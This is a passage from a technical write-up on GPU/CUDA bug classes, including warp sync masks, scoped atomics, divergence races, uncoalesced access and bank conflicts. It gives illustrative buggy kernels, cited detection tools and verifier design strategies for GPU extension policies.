&lt;p&gt;If policies can ever emit warp-level sync or cooperative-groups barriers, require a &lt;em&gt;verifiable&lt;/em&gt; mask discipline: e.g., only &lt;code&gt;__syncwarp(0xffffffff)&lt;/code&gt; (full mask) or masks proven to equal the active mask at the callsite. Otherwise, simplest is: &lt;strong&gt;ban warp sync primitives entirely&lt;/strong&gt; inside policies.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), By-construction. Banning &lt;code&gt;__syncwarp&lt;/code&gt;/CG barriers entirely (or requiring only full-mask sync at provably uniform points) makes invalid warp sync structurally impossible, providing perfect soundness with high completeness for policy use cases where warp-level sync is rarely needed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Policy code cannot introduce invalid warp synchronization because the verifier bans warp-level sync primitives. If allowed, only full-mask &lt;code&gt;__syncwarp(0xffffffff)&lt;/code&gt; at provably uniform points is permitted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: Compute Sanitizer &lt;code&gt;synccheck&lt;/code&gt; reports invalid sync arguments and divergent warps at runtime; iGUARD provides NVBit-based instrumentation for detecting sync hazards from modern CUDA features.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: iGUARD notes that ITS (Independent Thread Scheduling) and CG create new hazards that even experienced developers misuse. This justifies conservative restrictions; banning these primitives in policy code is the only sound approach without complex ITS-aware analysis.&lt;/p&gt;




&lt;h3&gt;
  
  
  3) Insufficient Atomic/Sync Scope [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;GPU adds &lt;em&gt;scope&lt;/em&gt; and memory-model subtleties that don't exist on CPUs. &lt;strong&gt;Scoped races&lt;/strong&gt; occur when synchronization/atomics are done at an insufficient scope (e.g., using &lt;code&gt;atomicAdd_block&lt;/code&gt; when &lt;code&gt;atomicAdd&lt;/code&gt; with device scope is needed). This is a distinct GPU bug class because scope semantics are unique to CUDA's memory model.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Scoped race: using block-scope atomic when device-scope is needed&lt;/span&gt;
&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="n"&gt;atomicAdd_block&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;  &lt;span class="c1"&gt;// only block-scope, may race across blocks&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;ScoRD introduces &lt;em&gt;scoped races&lt;/em&gt; due to insufficient scope and argues this is a distinct bug class.(&lt;a href="https://www.csa.iisc.ac.in/~arkapravab/papers/isca20_ScoRD.pdf" rel="noopener noreferrer"&gt;CSA - IISc Bangalore&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;iGUARD further targets races introduced by "scoped synchronization" and advanced CUDA features (independent thread scheduling, cooperative groups).(&lt;a href="https://akkamath.github.io/files/SOSP21_iGUARD.pdf" rel="noopener noreferrer"&gt;Aditya K Kamath&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Scope verification:&lt;/strong&gt; ensure atomics/sync use sufficient scope for the access pattern.&lt;/li&gt;
&lt;li&gt;Require explicit scope annotations and validate against access patterns.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Treat scope as part of the verifier contract: if policies do atomic/synchronizing operations, require the &lt;em&gt;strongest&lt;/em&gt; allowed scope (or forbid nontrivial scope usage). Practically: ban cross-block shared global updates unless they're done through a small set of "safe" helpers (e.g., per-SM/per-warp buffers → host aggregation). If policies use scoped atomics, require the scope to be explicit and conservative.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can touch kernel-shared global objects, scope correctness depends on kernel access patterns (Combined). However, this reduces to Extension-local by restricting policies to write only policy-owned state or requiring all atomics to use device-scope by default, providing strong soundness with medium completeness (policies needing block-scope atomics must use conservative device-scope).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: Two design choices enable Extension-local verification: (A) Policy only writes policy-owned state (maps, ringbuffers), never kernel globals: scope becomes irrelevant; (B) All policy atomics use device-scope by default: sufficient for any access pattern. Both approaches eliminate scope bugs without kernel inspection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: ScoRD introduces "scoped races" as a distinct bug class and provides detection (research prototype requiring hardware support); iGUARD targets races from scoped synchronization and advanced CUDA features via NVBit GPU-side runtime instrumentation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: If policies must write kernel-shared objects with fine-grained scope optimization, Combined analysis or contracts are required. ScoRD and iGUARD emphasize scope bugs are subtle and underdetected: defaulting to device-scope is a sound engineering choice.&lt;/p&gt;




&lt;h3&gt;
  
  
  4) Warp-divergence Race [Correctness, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;A &lt;strong&gt;warp-divergence race&lt;/strong&gt; is a GPU-specific phenomenon where &lt;strong&gt;divergence changes which threads are effectively concurrent&lt;/strong&gt;, producing racy outcomes that don't map cleanly to CPU assumptions. SIMT execution order + reconvergence can create subtle concurrency patterns. This is one reason "CPU-style race reasoning" doesn't port directly to GPUs. While control-flow divergence is generally a performance issue (serialized execution paths), warp-divergence race is a &lt;strong&gt;correctness&lt;/strong&gt; issue where divergence creates unexpected concurrency patterns leading to data races: same root cause, but different failure modes: perf degradation vs. racy/undefined behavior.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;A&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;31&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;A&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;      &lt;span class="c1"&gt;// first half writes&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt;           &lt;span class="n"&gt;A&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;      &lt;span class="c1"&gt;// second half writes&lt;/span&gt;
  &lt;span class="c1"&gt;// outcome depends on SIMT execution + reconvergence&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GKLEE explicitly lists "warp-divergence race" among discovered bug classes.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Simulee stresses CUDA-aware race definitions and discusses GPU-specific race interpretation constraints (e.g., avoiding false positives due to warp lockstep).(&lt;a href="https://zhangyuqun.github.io/publications/ase2019.pdf" rel="noopener noreferrer"&gt;zhangyuqun.github.io&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Verifier rule:&lt;/strong&gt; treat "lane-divergent side effects" as forbidden unless proven safe.&lt;/li&gt;
&lt;li&gt;Require that any helper with side effects is guarded by a &lt;strong&gt;warp-uniform predicate&lt;/strong&gt; or executed only by a designated lane (e.g., lane0). Then the verifier only needs to prove &lt;strong&gt;uniformity&lt;/strong&gt; (or single-lane execution), not full SIMT interleavings.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Enforce warp-uniform control flow for policy side effects. If divergence is unavoidable, force "single-lane execution" patterns where only lane0 performs the side effect. This eliminates warp-divergence races by construction.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Warp-divergence races arise from SIMT execution semantics, but can be prevented by structural restrictions on policy code, providing strong soundness with medium completeness (legitimately safe lane-divergent writes are rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier enforces that all side-effecting operations are either (1) under warp-uniform predicates, or (2) executed only by lane0 (single-lane execution pattern). This eliminates warp-divergence races without analyzing the kernel. The verifier proves uniformity or single-lane execution statically.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GKLEE explicitly lists "warp-divergence race" among discovered bug classes and explores divergent execution paths via concolic/symbolic testing; Simulee uses CUDA-aware race definitions that account for warp lockstep behavior to avoid false positives.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Policies with legitimately safe lane-divergent writes will be rejected. This trade-off is favorable: warp-divergence races are notoriously subtle: GKLEE found them in real SDK code: eliminating by construction is safer than complex SIMT interleaving analysis.&lt;/p&gt;




&lt;h3&gt;
  
  
  5) Uncoalesced / Non-Coalesceable Global Memory Access Patterns [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Warp memory coalescing is a GPU-specific performance contract. "Uncoalesced" accesses can cause large slowdowns (memory transactions split into many).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kt"&gt;float&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;   &lt;span class="c1"&gt;// stride&amp;gt;1 =&amp;gt; likely uncoalesced&lt;/span&gt;
  &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;stride&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mf"&gt;1.0&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUDrano: "detects uncoalesced global memory accesses" and treats them as performance bugs.(&lt;a href="https://github.com/upenn-acg/gpudrano-static-analysis_v1.0" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;, &lt;a href="https://www.cis.upenn.edu/~alur/Cav17.pdf" rel="noopener noreferrer"&gt;CAV17&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE: reports "non-coalesced memory accesses" as performance bugs it finds.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GPUCheck: detects "non-coalesceable memory accesses."(&lt;a href="https://webdocs.cs.ualberta.ca/~amaral/thesis/TaylorLloydMSc.pdf" rel="noopener noreferrer"&gt;WebDocs&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static analysis (GPUDrano/GPUCheck-style):&lt;/strong&gt; analyze address expressions in terms of lane-to-address stride; flag when stride exceeds coalescing thresholds.(&lt;a href="https://www.cis.upenn.edu/~alur/Cav17.pdf" rel="noopener noreferrer"&gt;CAV17&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If you want "performance as correctness," this is a flagship rule: restrict policy memory ops to patterns provably coalesced (e.g., affine, lane-linear indexing with small stride), and/or require warp-level aggregation so only one lane performs global updates. Require map operations to use &lt;strong&gt;warp-uniform keys&lt;/strong&gt; or &lt;strong&gt;contiguous per-lane indices&lt;/strong&gt; (e.g., &lt;code&gt;base + lane_id&lt;/code&gt;), not random hashes. If policies must do random accesses, restrict them to &lt;strong&gt;lane0 only&lt;/strong&gt;, amortizing the uncoalesced behavior to 1 lane/warp.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E) for policy-owned memory; Combined (C) for kernel arrays. Static-sound for policy memory: affine/lane-linear indexing guarantees coalescing with strong soundness but low completeness (random-access patterns rejected; kernel-array reads require Combined analysis).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: For policy-owned memory (maps, ringbuffers), restricting index expressions to affine/lane-linear forms (&lt;code&gt;base + lane_id&lt;/code&gt;) or lane0-only access provides bounded overhead guarantees. Warp-level aggregation (only lane0 performs global updates) amortizes uncoalesced behavior to 1 lane/warp. The verifier cannot guarantee coalescing for kernel-array reads without kernel knowledge.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUDrano statically detects uncoalesced global memory accesses and treats them as performance bugs; GPUCheck identifies non-coalesceable access patterns via thread-divergent expression analysis; GKLEE reports "non-coalesced memory accesses" as performance bugs via symbolic exploration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: True coalescing depends on hardware cache behavior and concurrent workloads: static analysis provides structural guarantees, not tight performance bounds. "Is it really slow / how slow" is architecture-dependent; static tools provide sound-ish structural warnings rather than tight performance proofs.&lt;/p&gt;




&lt;h3&gt;
  
  
  6) Control-Flow Divergence (warp branch divergence) [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;SIMT divergence serializes paths within a warp, lowering "branch efficiency" and increasing worst-case overhead. This entry focuses on divergence as a &lt;strong&gt;performance&lt;/strong&gt; issue. However, divergence is also the root cause of more severe correctness bugs: barrier divergence (deadlock when barriers are in conditional code) and warp-divergence races (unexpected concurrency patterns leading to data races).&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;float&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blockIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;blockDim&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt;                &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;in&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// divergence within warp&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GPUCheck explicitly targets "branch divergence" as a performance problem arising from thread-divergent expressions.(&lt;a href="https://webdocs.cs.ualberta.ca/~amaral/thesis/TaylorLloydMSc.pdf" rel="noopener noreferrer"&gt;WebDocs&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;GKLEE: "divergent warps" as performance bugs.(&lt;a href="https://lingming.cs.illinois.edu/publications/icse2020b.pdf" rel="noopener noreferrer"&gt;Lingming Zhang&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Wu et al.: "non-optimal implementation" includes performance loss causes like branch divergence.(&lt;a href="https://arxiv.org/pdf/1905.01833" rel="noopener noreferrer"&gt;arXiv&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static taint + symbolic reasoning (GPUCheck-style):&lt;/strong&gt; identify conditions dependent on thread/lane id, and prove whether divergence is possible.(&lt;a href="https://webdocs.cs.ualberta.ca/~amaral/thesis/TaylorLloydMSc.pdf" rel="noopener noreferrer"&gt;WebDocs&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;Divergence is the &lt;em&gt;core reason&lt;/em&gt; you can treat performance as correctness. Enforce &lt;strong&gt;warp-uniform control flow&lt;/strong&gt; for policies (or at least for any code path that triggers side effects / heavy helpers). If you can't prove uniformity, force "single-lane execution" of policy side effects (others become no-ops) to prevent warp amplification. Put a hard cap on the number of helper calls on any path, to bound the "divergence amplification factor."&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-sound. Control-flow divergence is determined entirely by the policy's branch conditions and their dependence on thread IDs, providing strong soundness via taint analysis but low completeness (data-dependent branches that happen to be uniform at runtime are rejected).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Production guarantee&lt;/strong&gt;: The verifier tracks which values depend on &lt;code&gt;threadIdx&lt;/code&gt;/&lt;code&gt;laneId&lt;/code&gt; (taint analysis). Branches on tainted values are either forbidden or force single-lane execution for side effects (others become no-ops). This bounds the "warp amplification factor" and prevents SIMT-amplified performance degradation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Offline/CI tools&lt;/strong&gt;: GPUCheck explicitly targets "branch divergence" as a performance problem via thread-divergent expression analysis; GKLEE reports "divergent warps" as performance bugs via symbolic exploration.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Residual gap&lt;/strong&gt;: Some safe data-dependent branches will be rejected. The gpu_ext design principle lists warp-uniform control flow as a load-time verification requirement: treating divergence as a correctness property (bounded overhead), not just optimization. For kernel-level divergence analysis, use GPUCheck or GKLEE.&lt;/p&gt;




&lt;h3&gt;
  
  
  7) Shared-Memory Bank Conflicts [Performance, GPU-specific]
&lt;/h3&gt;

&lt;h4&gt;
  
  
  What it is / why it matters
&lt;/h4&gt;

&lt;p&gt;Bank conflicts are a shared-memory–specific performance pathology: accesses serialize when multiple lanes hit the same bank.&lt;/p&gt;

&lt;h4&gt;
  
  
  Bug example
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cuda"&gt;&lt;code&gt;&lt;span class="k"&gt;__global__&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;__shared__&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt; &lt;span class="mi"&gt;31&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="c1"&gt;// stride hits same bank pattern (illustrative)&lt;/span&gt;
  &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;lane&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="n"&gt;out&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;threadIdx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Seen in / checked by
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;GKLEE explicitly lists "memory bank conflicts" among detected performance bugs.(&lt;a href="https://lipeng28.github.io/papers/ppopp12-gklee.pdf" rel="noopener noreferrer"&gt;Peng Li's Homepage&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Checking approach
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Static heuristic:&lt;/strong&gt; classify shared-memory index expressions by lane stride and bank mapping; warn if likely conflict.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Verification strategy
&lt;/h4&gt;

&lt;p&gt;If policies use shared scratchpads (e.g., per-block staging), enforce a &lt;strong&gt;conflict-free access pattern&lt;/strong&gt; (e.g., contiguous per-lane indexing such as &lt;code&gt;base + threadIdx.x&lt;/code&gt;). A static heuristic can classify shared-memory index expressions by lane stride and bank mapping, rejecting or warning on patterns likely to cause conflicts. Shared memory should not be banned entirely for this performance issue—it remains useful for legitimate policy scratchpads.&lt;/p&gt;

&lt;h4&gt;
  
  
  Verification scope analysis
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Scope &amp;amp; Assurance&lt;/strong&gt;: Extension-local (E), Static-heuristic. Enforcing conflict-free access patterns on shared memory eliminates most bank conflicts while still allowing policies to use shared scratchpads for legitimate purposes.&lt;/p&gt;

